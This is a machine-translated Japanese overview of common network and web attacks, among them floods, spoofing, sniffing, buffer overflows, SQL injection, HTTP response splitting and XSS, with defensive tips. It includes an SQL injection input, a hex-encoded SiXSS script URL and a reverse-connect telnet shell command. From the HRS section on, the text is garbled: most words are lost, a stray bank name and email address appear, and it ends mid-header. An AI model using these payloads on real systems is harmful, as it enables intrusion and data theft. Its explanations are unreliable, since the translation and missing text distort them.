䞀般的なセキュリティの脅嚁

おそらく誰もが、セキュリティを脅かすさたざたな方法があるこずを知っおいたす。 圌らは本圓に十分です、あなたがカットの䞋で読んだ埌にどれくらいの数を芋぀けるでしょうか。





以䞋で䜿甚されるすべおのリンクは、どこか間違った堎所に぀ながる堎合の䟋ずしお䜿甚されたす。



この蚘事は、 forxakep.ucoz.ru / publ / 3-1-0-16からも入手できたす。

forum.netall.ru/index.php?showtopic=125182&st=0&p=1573116&#entry1573116

www.inattack.ru/article/402.html


釣りたたはフィッシング。

非垞に広い抂念。 その意味は、ナヌザヌパスワヌド、クレゞットカヌド番号などたたはお金から情報を取埗するこずです。 この手法は、1人のナヌザヌではなく、倚くのナヌザヌを察象ずしおいたす。 たずえば、技術サポヌトからの手玙が銀行のすべおの既知の顧客に送信されたす。 通垞、手玙には、技術的な䜜業のために、アカりントにパスワヌドを送信するリク゚ストが含たれおいたす。 埓業員は誰もそのような情報を芁求するこずはできず、この情報を開瀺すべきではないずナヌザヌに譊告されおいるにもかかわらず、番号やパスワヌドなどを「䞎える」こずに満足しおいる人は垞にいたす。 そのような手玙は通垞非垞に信じられおおり、構成がよく、だたされやすいナヌザヌを買収する可胜性がありたす。 フィッシングには、文字に加えおいく぀かの方法があるこずに泚意しおください。 以䞋の手法の䞀郚は、正しく䜿甚された堎合、フィッシングに適しおいたす原則ずしお、手法の説明でこれを蚀及しおいたす。

掚奚事項パラノむアが最良の防埡であるこずを忘れないでください。 疑わしいものを信頌しないでください。デヌタを誰ずも共有しないでください。 パスワヌドがサヌバヌにアクセスするように蚭蚈されおいる堎合、管理者はパスワヌドを知る必芁はありたせん。 サヌバヌを完党に制埡し、パスワヌド自䜓を確認したり、倉曎したりできたす。






゜ヌシャル゚ンゞニアリング

技術的ではなく、心理的なテクニックです。 むンベントリ䞭に取埗したデヌタを䜿甚しお、クラッカヌは管理者に代わっお䞀郚のナヌザヌ䌁業ネットワヌクなどに電話をかけ、パスワヌドなどを芋぀けようずしたす。 これは、倧芏暡なネットワヌクでナヌザヌがすべおの埓業員を把握しおいない堎合に可胜になり、さらには、電話で垞に正確に認識できない堎合もありたす。 さらに、耇雑な心理的手法が䜿甚されるため、成功の可胜性が倧幅に高たりたす。

掚奚事項同じ。 本圓に必芁がある堎合は、必芁なデヌタを盎接提䟛しおください。 パスワヌドを玙に曞き留めた堎合は、パスワヌドをどこにも残さないで、可胜であれば砎棄し、ゎミ箱に捚おるだけではありたせん。






りむルス。

最も単玔なナヌザヌの問題に知られおいたす。 䞀番䞋の行は、ナヌザヌのコンピュヌタヌぞのマルりェアの導入です。 結果は異なる堎合があり、コンピュヌタヌが感染しおいるりむルスの皮類によっお異なりたす。 しかし、䞀般的には-情報の盗甚からスパムの送信、DDoS攻撃の組織化、コンピュヌタヌの完党な制埡の取埗たで。 レタヌに添付されたファむルに加えお、りむルスはOSの脆匱性を介しおコンピュヌタヌに䟵入する可胜性がありたす。これに぀いおは、蚘事「Windows Vulnerability Rating」で説明しおいたす。 倚くのりむルスがありたすが、それらを分類するこずはただ可胜です。 車茪を再発明したくないので、このペヌゞschool8.uriit.ru/people/av/class.htmlの情報を䜿甚しお、説明付きのりむルスの分類を瀺したす。 このトピックの詳现に぀いおは、 fivt.krgtu.ru / kafedri / mo / site / ANTIVIRUS / pages / 02.htmをご芧ください。

掚奚事項りむルス察策゜フトりェアを䜿甚したす。 DrWEBたたはKaspersky Anti-Virusレゞストリをチェックしないためのみに限定せず、Ad-Aware、SpyBot、XSpyなどのマルりェアに察する特別なりむルス察策を䜿甚しおください。 たた、疑わしい添付ファむルを開いたり、未知の送信者からのプログラムを開いたりしないでください。 送信者がよく知っおいおも、最初にりむルス察策をチェックしおください。 ここでは、医孊のように、埌で治すよりも避けるほうが簡単です。






DoSサヌビス拒吊たたはサヌビス拒吊。

これは別の攻撃ではなく、攻撃の結果であるず蚀いたかったのです。 システムたたは個々のプログラムを無効にするために䜿甚されたす。 これを行うために、クラッカヌは特別な方法でプログラムぞのリク゚ストを䜜成し、その埌機胜を停止したす。 プログラムを動䜜状態に戻すには、再起動が必芁です。 DoSはFloodタむプの攻撃ず同じであり、䞀般に、DoSずいう䞀般名でシステムの障害に぀ながるすべおの攻撃を組み合わせる必芁があるず考えられおいたす。 それに蚀及する䟡倀がありたす



-䞀般的な甚語はなく、攻撃を分類するためのかなり暗黙のルヌルがありたす。そのため、この蚘事のフレヌムワヌク内でも、ある皋床䞀般的な分類を行いたす。

-既に述べたように、Floodだけでなく、たずえば、Buffer Overflowは、サヌビス拒吊に぀ながる可胜性がありたす。



したがっお、DoSは攻撃の結果ずしお説明できたす。 䟋「サヌビス拒吊の圱響は、フラッド攻撃を䜿甚しお達成されたす。」






措氎措氎たたは河川/措氎

このタむプはかなり議論の䜙地があり、䞀郚はDoSに起因する可胜性がありたすが、別途匷調したいず思いたす。 倚くのマシンからこの堎合、攻撃はDDoS分散サヌビス拒吊攻撃ず呌ばれたす。分散サヌビス拒吊攻撃ず呌ばれたす、原則ずしお、ゟンビは被害者に可胜な限り最倧数の芁求接続芁求などを送信したす。 このこずから、被害者は各リク゚ストに応答する時間がなく、その結果、ナヌザヌのリク゚ストに応答したせん。 正垞に機胜しなくなったず蚀えたす。 泚このタむプの攻撃は、たずえばフォヌラムが無意味なメッセヌゞでいっぱいになっおいる堎合、フヌリガン䞻矩ず呌ばれたす。 次のFloodタむプを区別できたす。



--SYN Flood-攻撃されたコンピュヌタヌをSYNパケットでフラッディングしたす。 ご存じのように、コンピュヌタはそのようなパケットにSYN / ACKタむプのパケットで応答する必芁がありたす。 SYNパケットが倚すぎる堎合、コンピュヌタヌはそれぞれに応答する時間がなく、他のコンピュヌタヌからパケットを受信できたせん。

--ICMP FloodたたはPing Flood-同じこず、ICMPパケットのみ。 システムはそのようなパケットに応答する必芁がありたす。これにより、チャネルのパフォヌマンス垯域幅を䜎䞋させる倚数のパケットが䜜成されたす。

--Identification FloodIdent Flood。 ICMP Floodに䌌おいたすが、タむプidentdのポヌト113に察する芁求ぞの応答にはシステムからの時間がかかるため、攻撃はより効果的です。

--DNS Flood-攻撃はDNSサヌバヌに向けられたす。 サヌバヌには応答する時間がないDNSク゚リが殺到しおいるため、ク゚リにも応答できたせん。 その結果、むンタヌネットサむトにアクセスできなくなりたす。

--DDoS DNS-攻撃はたったく新しいものであり、「定評のある」名前を満たしおいたせんでした。 実際、この手法は以前の手法ずほが同じですが、唯䞀の違いは、リク゚ストが倚数のマシンから送信されるこずです以前のタむプはこれを陀倖したせん。 DNSサヌバヌがこれらの芁求に応答するアドレスは、DNSサヌバヌ自䜓のアドレスず同じです。 圌はDNSク゚リであふれおいるだけでなく、圌自身にもそれらを送信したす。 したがっお、受信は前の受信よりも効果的ですが、実装するのもより困難です。

--BoinkBonk、Teardrop-非垞に断片化された膚倧な数のパケットが被害者に送信されたすが、断片は倧きくなりたす。 断片化されたパケットごずに、埌で他のフラグメントを配眮できるように、埌で他のフラグメントが配眮される特別なバッファが割り圓おられたす。 膚倧な数の倧きなフラグメントがバッファをオヌバヌフロヌし、フリヌズたたはクラッシュを匕き起こす可胜性がありたす。

--Pongは䞊蚘の他のタむプず同じですが、唯䞀の違いは送信者アドレスが停物であるこずです。 これにより、クラッカヌに匿名性が䞎えられたす。



掚奚事項OSたたはルヌタヌごず。 それらは通垞、技術文曞に蚘茉されおいたす。 それらを無芖しないでください。有効なパケットの数を明確に制限しおください。 残念ながら、䞀郚の皮は物理的な切断以倖には反映できたせん。 適切に構成されたファむアりォヌルたたはファむアりォヌルは、倚くの堎合、䞇胜薬です。






SmurfTCP-IPプロトコルの実装゚ラヌを狙った攻撃

珟圚、このタむプの攻撃ぱキゟチックず芋なされおいたすが、以前は、TCP-IPプロトコルがかなり新しいものであったため、たずえばIPアドレスを眮き換えるこずができる倚くの゚ラヌが含たれおいたした。 ただし、このタむプの攻撃は匕き続き適甚されたす。 䞀郚の専門家は、TCP Smurf、UDP Smurf、ICMP Smurfを指摘しおいたす。 もちろん、この区分はパッケヌゞのタむプに基づいおいたす。

掚奚事項CISCOスむッチは、他の倚くの補品ず同様に、新しい゜フトりェアずファむアりォヌルだけでなく、優れた保護を提䟛したす。 ブロヌドキャスト芁求をブロックする必芁がありたす。




Ping-of-DeathたたはJolt、SSPing

攻撃は、フラグメント化されたICMPパケットが被害者に送信されるが、フラグメントサむズが非垞に倧きい64kBずいうこずです。 Windows 95などの叀いバヌゞョンのOSがハングしたす。 この攻撃は、シャドりセキュリティスキャナヌを䜿甚しお実行できたす。

掚奚事項OSを曎新し、叀いバヌゞョンを攟棄するのが最も簡単です。




UDPストヌムUDPストヌム

被害者で少なくずも2぀のUDPポヌトが開いおおり、それぞれが送信者に応答を送信する堎合に䜿甚されたす。 たずえば、タむムサヌバヌのあるポヌト37は、珟圚の日付ず時刻を芁求に送信したす。 クラッカヌは、被害者のポヌトの1぀にUDPパケットを送信したすが、送信者は被害者のアドレスず被害者の2番目に開いおいるUDPポヌトを瀺したす。 その埌、ポヌトは互いに無限に応答し始め、パフォヌマンスが䜎䞋したす。 ストヌムは、パケットの1぀が消えるずすぐに停止したすたずえば、リ゜ヌスの過負荷のため。

掚奚事項可胜であれば、UDPパケットを受け入れるサヌビスの䜿甚を陀倖するか、ファむアりォヌルを䜿甚しお倖郚ネットワヌクから切断したす。




UDPボム

クラッカヌは、䞍正なサヌビスデヌタフィヌルドを含むUDPパケットをUDPシステムに送信したす。 必芁に応じおデヌタに違反する可胜性がありたすたずえば、フィヌルド長、構造が正しくない。 これにより、クラッシュする可胜性がありたす。

掚奚事項゜フトりェアを曎新したす。




土地



パケットは特定のポヌトで被害者に送信されたすが、送信者のアドレスは被害者ず同じアドレスに蚭定され、送信者のポヌトは受信者のポヌトず等しくなりたす。 䟋受信者1.1.1.1ポヌト111送信者1.1.1.1ポヌト111。 被害者は自分ずの接続を確立しようずしおいるため、システムがハングする可胜性がありたす。 同様の攻撃は、䞀郚のルヌタヌに察しおも100効果的です。




メヌル爆撃

攻撃されたコンピュヌタヌにメヌルサヌバヌがある堎合、それを無効にするために膚倧な数のメヌルメッセヌゞが送信されたす。 䞀方で、これはFloodを連想させたすが、䞀方で、サヌバヌのりむルス察策゜フトりェアによっおスキャンされる倧きな添付ファむルがメッセヌゞに含たれおいる堎合、このような倚数の着信添付ファむルのスキャンは、パフォヌマンスを倧幅に䜎䞋させるか、たたは䜕も枛らすこずができたせん。 さらに、そのようなメッセヌゞはサヌバヌのハヌドディスクに保存され、オヌバヌフロヌする可胜性があり、DoSを匕き起こす可胜性がありたす。 もちろん、今ではこの攻撃は単なる物語に過ぎたせんが、堎合によっおは䟝然ずしお䜿甚できたす。

掚奚事項メヌルサヌバヌの適切な構成。




スニッフィング

ネットワヌク内のスむッチの代わりにハブがむンストヌルされおいる堎合、受信したパケットはネットワヌク䞊のすべおのコンピュヌタヌに送信され、コンピュヌタヌはそれらのパッケヌゞを決定したす。 クラッカヌがそのようなネットワヌクに含たれるコンピュヌタヌにアクセスするか、ネットワヌクに盎接アクセスするず、パスワヌドを含むネットワヌクセグメントの再配垃で送信されるすべおの情報が利甚可胜になりたす。 攻撃者は単にネットワヌクカヌドをリスニングモヌドにし、意図されおいるかどうかに関係なくすべおのパケットを受け入れたす。 TcpDumpビルトむン* NIXシステム、WinDumpWindows、ビルトむンではないなどのコン゜ヌルスニファヌずしお䜿甚できるだけでなく、Irisなどの芖芚化されたむンタヌフェむスでも䜿甚できたす。

掚奚事項ハブの代わりにスむッチを䜿甚し、トラフィックを暗号化したす。




IPハむゞャック

ネットワヌクぞの物理的なアクセスがある堎合、クラッカヌはネットワヌクケヌブルに「クラッシュ」し、パケットの送信の仲介者ずしお動䜜するため、2台のコンピュヌタヌ間のすべおのトラフィックをリッスンしたす。 他のメ゜ッドを実装できない堎合を陀いお、しばしばそれ自䜓を正圓化しない非垞に䞍䟿なメ゜ッド。 このような組み蟌み自䜓は䞍䟿ですが、このタスクを少し簡玠化するデバむスがありたすが、特に、障害やチャネルぞの䟵入の怜出を回避するためにパケットの番号付けを監芖したす。 この方法はATMをだたすために䜿甚されたすが、銀行ずATM間の接続は受け入れられないため、このケヌスは技術的に難しく、チャネルを䞭断せずに「突入」するのは高床な資栌を持぀専門家のみです。 さらに、ATMのむンストヌルが倧幅に改善され、ケヌブルぞの物理的なアクセスが無料になる可胜性がなくなりたした。



掚奚事項ボックスぞのアクセスなど、ケヌブルぞのアクセスに泚意しおください。 トラフィックを暗号化したす。




ダミヌARPFalse ARP

ARPサヌバヌ、ルヌタヌ、たたはスむッチは、MACアドレスネットワヌクカヌドなどに属するIPを認識しおいたす。 ネットワヌクぞの物理的なアクセスが可胜な堎合、攻撃者はARP応答を停装し、IPを受け取っおネットワヌク䞊の別のコンピュヌタヌになりすたすこずができたす。 したがっお、そのコンピュヌタヌ宛おのすべおのパケットは圌によっお受信されたす。 これは、そのコンピュヌタヌがオフになっおいる堎合に可胜です。そうしないず、このアクションによりIPアドレスの競合が発生したす同じネットワヌク䞊に同じIPアドレスを持぀コンピュヌタヌが2台存圚するこずはできたせん。

掚奚事項IPのMACアドレスの倉曎に぀いお通知する゜フトりェアを䜿甚し、ARPサヌバヌのログファむルを監芖したす。




ダミヌDNSサヌバヌ停のDNSサヌバヌ

ネットワヌク蚭定が自動モヌドに蚭定されおいる堎合、ネットワヌクに接続するず、コンピュヌタヌはDNSサヌバヌになる「芁求」぀たり、ブロヌドキャストパケットを送信したす。DNSサヌバヌは埌でDNSク゚リを送信したす。 ネットワヌクぞの物理アクセスがある堎合、クラッカヌはそのようなブロヌドキャスト芁求を傍受し、自分のコンピュヌタヌがDNSサヌバヌになるこずを応答できたす。 その埌、圌はだたされた被害者を任意のルヌトに沿っお送るこずができたす。 たずえば、被害者が銀行のりェブサむトにアクセスしおお金を送金したい堎合、クラッカヌはそれを自分のコンピュヌタヌに送信し、そこでパスワヌド入力フォヌムが䜜成されたす。 その埌、パスワヌドはクラッカヌに属したす。 攻撃者はDNSサヌバヌよりも早く被害者に察応する必芁があるため、これはかなり耇雑な方法です。



掚奚事項可胜であれば、芋知らぬ人のネットワヌクぞのアクセスを制限したす。




ファゞヌ

UDPなどの特定のタむプのパケットをブロックするようにフィルタヌを構成できたす。 攻撃者は、このUDPパケットがフィルタリングしないこずをフィルタヌが理解しないようにパケットを䜜成し、宛先に到達するこずができたす。 このようにしお、攻撃者はパケットフィルタをバむパスできたす。 この手法は非垞に狭く、特別な堎合、より正確には接続が双方向である必芁がない堎合を察象ずしおいたす。 ほずんどの堎合、双方向通信は䞍可胜です。なぜなら、 基本的に、特定のタむプの着信パケットがポヌトでブロックされるず、発信パケットがブロックされたす。 補造されたパケットがフィルタヌを通過した堎合でもたずえば、UDPポヌトに、サヌバヌは同じタむプのパケットで応答したす。 UDP、しかし同時に圌はクラッカヌの䟋に埓っおそれを補造したせん。 T.O. この発信パケットは陀倖され、クラッカヌに到達したせん。 ずにかく、この皮の攻撃から身を守る䟡倀はただありたす。

掚奚事項通垞、新しいバヌゞョンのファむアりォヌルは、この手法に察する十分な保護を提䟛したす。




プケ

クラッカヌはICMP到達䞍胜応答リモヌトシステム゚ラヌを䜜成したす。これにより、クラむアントはサヌバヌから切断されたす。 攻撃のためにクラむアントをサヌバヌから切断する必芁がある堎合、補助ツヌルずしお䜿甚される可胜性が高くなりたす。

停の到達䞍胜-クラッカヌはパッケヌゞを配信できない到達䞍胜ずいうメッセヌゞを䜜成するため、サヌバヌはクラむアントに障害があり、パッケヌゞが意図したずおりに配信されおいないず刀断したす。 これにより、サヌバヌがクラむアントを切断する堎合がありたす。 たた、No。17ず同様の補助ツヌルは、クラむアントではなくサヌバヌに向けられおいたす。




IPスプヌフィングスプヌフィングたたはIP眮換

攻撃者は自分の実際のIPを架空のIPに眮き換えたす。 これは、特定のIPアドレスのみがリ゜ヌスにアクセスできる堎合に必芁です。 攻撃者は、アクセスするために実際のIPを「特暩」たたは「信頌」に倉曎する必芁がありたす。 この方法は異なる方法で䜿甚できたす。 2台のコンピュヌタヌがパスワヌドを確認しお盞互の接続を確立した埌、クラッカヌは被害者に特別に生成されたパケットでネットワヌクリ゜ヌスを過負荷にする可胜性がありたす。 したがっお、圌はトラフィックを自分自身にリダむレクトしお、認蚌手順をバむパスできたす。

掚奚事項倚くの手法があるため、それらの倚くが存圚する可胜性がありたす。 ただし、SYNおよびACKフラグを蚭定しお応答パケット時間を短瞮し、キュヌで接続を確立するSYNリク゚ストの最倧数を増やすtcp_max_backlogこずで、脅嚁が軜枛されるただし、正圓な接続では困難になる可胜性があるこずに泚意しおください。 SYN-Cookieを䜿甚するこずもできたす。

ホストのなりすたし。 ネットワヌクぞの物理アクセスを必芁ずする非垞に高床な手法。 各コンピュヌタヌは、すべおのパケットを送信するルヌタヌを認識しおいたす。すべおのパケットは、ルヌタヌによっお宛先に配信されたす。 ルヌタヌが倉曎されるず、リダむレクト通知が各コンピュヌタヌに送信され、その埌コンピュヌタヌは新しいルヌタヌにパケットを送信し始めたす。 攻撃者はこのような通知を䜜成し、ルヌタヌを停装しお、ネットワヌクセグメント内のトラフィックを制埡できるようにしたす。

掚奚事項ネットワヌクアクセスずルヌタヌが倉曎された瞬間を制埡したす。 たずえば、過去のすべおのトラフィック぀たり、叀い接続が新しいルヌタヌに「衚瀺」されおいるかどうかを監芖できたす。




パスワヌド掚枬。

アカりントのパスワヌドを遞択しおシステムに登録するために䜿甚されたす。 2぀のタむプがありたす文字のすべおの可胜な組み合わせの遞択BruteForceおよび蟞曞による遞択。 最初の方法はより効果的です、なぜなら キヌボヌドからパスワヌドずしお入力した文字の組み合わせはただありたすが、この方法は、特に句読点を考慮した堎合など、非垞に遅くなりたす。 2番目の方法は簡単ですが、たずえば「My-New-Password」などの蟞曞にない単語を入力した堎合、蟞曞から遞択するこずはできたせん。 パスワヌドを遞択するのに圹立぀プログラムはたくさんあるので、特定の名前を付けるのは理にかなっおいないず思いたす。 原則ずしお、プログラム、OSなどは暗号化された圢匏でパスワヌドを保存するため、攻撃者がファむルにアクセスしたずしおも、パスワヌドを解読する必芁がありたす。 圌はこれを自宅のコンピュヌタヌで数日間行うこずができたす。

掚奚事項耇雑なパスワヌドを䜿甚し、できれば句読点を䜿甚しおください。 パスワヌドの詊行回数を制限したす。 パスワヌドの埩号化に察しおは、その耇雑さのみが圹立ちたす。




バックコネクト/パむプ/リバヌス

これは補助的な手法ですが、それ自䜓が非垞に興味深いものです。 たずえば、攻撃者は毎回1぀のコマンドのために倚くのアクションを実行するこずを望みたせん。 圌はこの手法を䜿甚しおタスクを簡玠化できたす。 その本質は、クラッカヌが攻撃されたコンピュヌタヌをクラッカヌのコンピュヌタヌに匷制的に接続させるこずです。 たずえば、攻撃されたコンピュヌタヌでは、telnet [ip.addresser] [port]コマンドを実行できたす。 この埌、クラッカヌは実際、攻撃されたコンピュヌタヌでコマンドラむンコマンドシェルたたはシェル/シェルを受け取りたす。




゜フトりェアの脆匱性

゜フトりェアのバグを䜿甚する。 効果は異なる堎合がありたす。 重芁ではない情報の受信から、システムを完党に制埡するたで。 ゜フトりェアのバグによる攻撃は、垞に最も人気がありたす。 叀いバグは新しいバヌゞョンで修正されたすが、新しいバグは再び䜿甚できる新しいバグをもたらしたす。 さらに、攻撃の皮類ではなく、゜フトりェア゚ラヌを攻撃する方法に぀いお説明したす。 掚奚事項掚奚事項は䞀般的なものであるため、すぐにすべおの人に提䟛したす。「安党に」曞かれたプログラムコヌドのみが圹立ちたす。 このトピックでは、むンタヌネット䞊で倧量の資料を芋぀けるこずができたす。




バッファオヌバヌフロヌ

非垞に危険なタむプの攻撃は、リク゚ストが割り圓おられたメモリフレヌムをオヌバヌフロヌさせるような方法でリク゚ストが圢成され、リク゚スト内の「瞫補」コマンドがスタックに到着し、プロセッサによっお実行される堎合です。 クラッカヌが攻撃されたコンピュヌタヌでプログラムを実行できる堎合、これはリモヌトずロヌカルの䞡方で実行できたす。 これは、コンピュヌタヌでコヌドを実行するためず、暩限を䞊げるための䞡方に䜿甚できたす。 バッファオヌバヌフロヌ攻撃にはいく぀かのサブタむプがありたす。 それぞれに぀いおは説明したせん。なぜなら、 原則を説明するために、プログラミングに䞍慣れな人々には理解できないコヌドの䟋を提䟛する必芁がありたす。 以䞋の分類は、Andrey Kolishchakandr [at] sandy.ruに属し、圌の蚘事「Attacks on buffer overflow」にありたす。 そのため、この蚘事でその説明、䟋、掚奚事項を盎接芋぀けるこずができたす。 審査のためだけに提䟛したす。



---「スタック障害」を攻撃する

---パラメヌタ化による「スタック障害」の攻撃

---制埡の移動による「スタック障害」の攻撃

---関数ポむンタの歪み

---関数ポむンタぞの攻撃

---パラメヌタ化による関数ポむンタぞの攻撃

---コントロヌル転送による関数ポむンタヌぞの攻撃

---遷移衚の歪み

---倉換テヌブルに察する攻撃

---パラメヌタ化による遷移テヌブルぞの攻撃

---コントロヌル転送による遷移テヌブルぞの攻撃

---デヌタポむンタヌの歪み

---デヌタポむンタヌディストヌション攻撃

---パラメヌタヌ化によるデヌタポむンタヌの歪みを䌎う攻撃

---元のコヌドでのデヌタポむンタヌの歪みによる攻撃。



䞊蚘の分類にもう1぀のタむプ、敎数オヌバヌフロヌ敎数オヌバヌフロヌを远加したいず思いたす。 詳现に぀いおは、Bleximの蚘事「敎数オヌバヌフロヌ攻撃」および「敎数オヌバヌフロヌ保護」たたは「基本敎数オヌバヌフロヌ」を参照しおください。




粉砕

ロヌカルでのみ䜿甚可胜なWindowsシステムの脆匱性。 これはバッファオヌバヌフロヌず非垞によく䌌おいたすが、同じ結果になりたす。クラッカヌコマンドがスタックにヒットしたす。 これは、入力フィヌルドを持぀Windowsのすべおのりィンドりが入力倀の最倧長を持っおいるずいう事実に基づいおいたす。 プログラム開発の段階でむンストヌルされたす。小さなフィヌルドの堎合、たずえば50文字です。キヌボヌドから50文字を超える文字数を入力するこずはできたせんが、Windowsりィンドりの操䜜はメッセヌゞに基づいおいたす。 ヘッダヌヘッダヌたたはヘッダヌ特別、OS専甚入力フィヌルドを簡単に取埗し、入力フィヌルドにこのヘッダヌを䜿甚しおSETTEXTテキスト蚭定メッセヌゞを送信できたす。 メッセヌゞには、それぞれ50文字以䞊のテキストをむンストヌルする必芁があるこずを瀺す必芁がありたす。50文字目以降に発生するすべおの凊理はスタックに移動し、プロセッサによっお実行されたす。 これに察する保護はありたせん。 唯䞀の䞇胜薬は、AMD Athlon 64プロセッサです。これらのプロセッサには保護機胜が組み蟌たれおおり、スタックからコマンドを実行したせん。




NukeWinNukeたたはNuke

今、これは物語の詳现です。 Windowsは、デフォルトでNetBIOSプロトコルを䜿甚しお、ネットワヌク䞊のファむルずプリンタヌを共有したす。 これを行うために、OSは3぀のTCPポヌト137、138、139を開きたす。 叀いバヌゞョンのWindowsでのこのプロトコルの実装には脆匱性が含たれおいたした。 䞀番䞋の行は、ポヌト139を開くために耇数のOutOfBand "メッセヌゞ"を連続しお送信できるこずです。 システムはそのようなデヌタを正しく凊理できず、システムがハングしたした。 そのような攻撃のための倚くのプログラムが䜜成されおいたすが、SSPingのツヌルずしおすでに名前を付けたShadow Security Scannerに぀いおのみ蚀及したす。




クロスナヌザヌ攻撃

私たちの意芋では、かなりあいたいな名前、なぜなら 最善の方法は攻撃の本質を反映しおいるわけではありたせんが、それでもこの有名な名前を守りたす。 Squid 2.4およびISA / 2000では、ナヌザヌはサヌバヌずTCP接続を共有できたす。 HRS埌述を䜿甚するず、サヌバヌから2぀の応答を匕き起こし、そのうちの1぀はクラッカヌによっお制埡され、ナヌザヌが受信した情報を改ざんするこずができたす。

CGIに察する攻撃。 ほずんどのWWWWebサヌバヌは、スクリプトを䜿甚しおナヌザヌに远加のサヌビスを提䟛したり、远加の機胜を提䟛したりしたす。 たずえば、mail.ruなどのメヌルサヌバヌ倚くのサヌバヌには、「自己䜜成」CMSコンテンツ管理システムたたはコンテンツ管理システムサむトがありたす。 プログラマヌは、ナヌザヌが入力した倀をチェックするように垞にスクリプトを匷制するわけではありたせん。これにより、そのような芋萜ずしをさたざたな目的に䜿甚するこずができたす。 バッファオヌバヌフロヌ攻撃は、CGIスクリプト゚ラヌを介しお実行するこずもできたす。 䟋 http// host / cgi-bin / helloworldType = A * 100 ぀たり、文字Aは100回になりたす。 優れた蚘事はhttp://www.opennet.ru/base/sec/linux_sec_guide.txt.htmlにありたす。2番目の郚分では、CGIプログラマヌによっお通垞無芖されるセキュリティ問題に぀いお説明しおいたす。 倚くはハッキング方法ではありたせんが、ハッキングに圹立぀だけなので、良いコヌドを曞くためには蚘事を読むこずをお勧めしたす。 この蚘事の範囲では、安党なコヌドを曞くずいうトピックを掘り䞋げるこずはできたせん。そのため、少なくずも、受信したデヌタからすべおのサヌビス文字をフィルタヌする必芁があるずのみ蚀いたす。




SQLむンゞェクション

ナヌザヌが入力したデヌタが怜蚌なしで生成されたSQLク゚リで䜿甚される堎合、クラッカヌはデヌタを入力しおSQLデヌタベヌスから情報を取埗できたす。 䟋「SELECTログむン、email = '$ email'のメンバヌからのパスワヌドFROM;」ずいうリク゚ストがありたす。$メヌルがナヌザヌによっおテヌブルに入力されるず、リク゚ストが凊理され、結果がペヌゞに衚瀺されたす。 攻撃者はデヌタを倉曎し、「my@mail.ru 'OR login LIKE'admin」ずいうフォヌムに入力できたす。 したがっお、生成されるSQLク゚リは次のようになりたす。「SELECT login、password FROM members where email='my@mail.ru 'OR login LIKE'admin ';」。 したがっお、クラッカヌはadminを含むログむンを持぀ナヌザヌからパスワヌドを受け取りたす。




HRSHTTPリ゜ヌス分割

かなり若く、私たちの意芋では耇雑なトリックですXSSにのみ䜿甚しない堎合。これにより、ハむゞャックペヌゞ、クロスナヌザヌ改ざん、Webキャッシュポむズニング、ブラりザヌキャッシュポむズニング、XSSなどの攻撃を実装できたす以䞋で説明したす。 攻撃の本質は、特別に準備されたHTTPリク゚ストを䜿甚する攻撃者が、HRSに察しお脆匱なWebサヌバヌに、2぀の個別のHTTPレスポンス通垞の状況では1぀ではないで犠牲者攻撃者ではなくに応答させるこずです。 HTTP , ! , , . - , - (, - ). しかし HTTP ( ) HTTP ( )! , , «» - , ( ). , , , , , cookie . , HRS, , HRS.




Cross User Defacement

«» , , – . – . , HRS. , IP , -, «» . .




Web Cache Poisoning

, , . , , , , -. , . , , .

Browser Cache Poisoning. , . , Web Cache Poisoning, , .




Hijacking Pages

, «» , -, , -, . , , . . , TCP ( «»), TCP («») TCP - («»). スキヌムは次のずおりです。



--- «» ( «») , - «» «1» «2» ( HRS).

--- «» «» -.

---- «1» «2» «».

— , «1» «» «».

--- «» «». «», .

--- «» - «», «2» -.

--- «» «2» «».

— «2» «».

— - «» «».

--- «2» - «», «» «2».

— «» «». T.O. , , .



, , . , , , . , , , , .




CSS/XSS (Cross-Site Scripting )

, Microsoft , Java Script . , Java , «» , . , . , cookie . , . , cookie ! : «», snf.jpg, document.cookie . , , , (, ), «» cookie, . , , ( , JPG) . , (: «photo.jpg») JAVA . XSS, , Java Script . , .




SiXSS (SQL Injection Cross Site Scripting)

SQL Injection XSS, .. XSS SQL Injection. , MySQL ( 0) . , SQL , «» «3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E». SQL Injection , : www.victim.com/vuln_script.php ? vuln_variable=1+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2

F7363726970743E , vuln_variable vuln_script , . SiXSS, , . , . , . XSS , . , , «» , , « ». , , , SQL , «UNION», : , . , %F1%F1%FB%EB%EA%E0 , . , , . , , , SQL . , , , JAVA. . , , «» «Apex Bank PLC», apexbnkplcc@yahoo.co.uk , , . !




SiHRSSQLむンゞェクションHTTPリ゜ヌス分割

レセプションは、SQLむンゞェクションに察するスクリプトの脆匱性を介しおHTTPリ゜ヌス分割を実装したす。これは、たずえばむンデックスによるスクリプトが、最初にHTTPアドレスのSQLデヌタベヌスにアクセスし、次にHTTP芁求を生成し、SQLデヌタベヌスから受信したHTTPアドレスを䜿甚しお「Location」フィヌルドのHTTP芁求を眮き換える堎合に可胜になりたす。これは、サむトのむンタヌネットディレクトリでよく䜿甚されたす。SiHRSに16進数で䜿甚できるHTTPヘッダヌの䟋を挙げるこずができたす。

HEXコヌドを遞択 'i.php'

Content-Length0



HTTP / 1.1 200 OK

Content-Ty



All Articles